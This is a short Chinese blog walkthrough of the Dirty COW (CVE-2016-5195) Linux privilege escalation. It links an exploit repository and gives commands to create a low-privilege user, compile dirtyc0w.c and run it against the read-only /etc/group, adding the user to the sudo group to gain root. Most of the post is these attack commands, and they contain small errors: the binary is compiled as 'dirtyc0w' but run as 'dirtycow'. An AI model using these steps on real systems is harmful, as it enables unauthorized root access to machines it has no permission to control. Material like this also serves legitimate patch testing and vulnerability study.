0
点赞
收藏
分享

微信扫一扫

脏牛提权 CVE-2016-5195

RockYoungTalk 2022-04-14 阅读 37

该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以
破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的
写权限,进一步获取 root 权限

exp下载 https://github.com/Brucetg/DirtyCow-EXP

该漏洞需要攻击者先获取一个低权限的用户,首先新建一个账户yidian 密码123456
在这里插入图片描述
将脚本上传到目标吗服务器,gcc编译

gcc -pthread dirtyc0w.c -o dirtyc0w
chmod +x dirtycow
./dirtycow /etc/group "$(sed '/\(sudo*\)/ s/$/,yidian/' /etc/group)"

执行exp在这里插入图片描述
切换到yidian用户由于已经加入sodu组可以直接切换到root权限
在这里插入图片描述

举报

相关推荐

0 条评论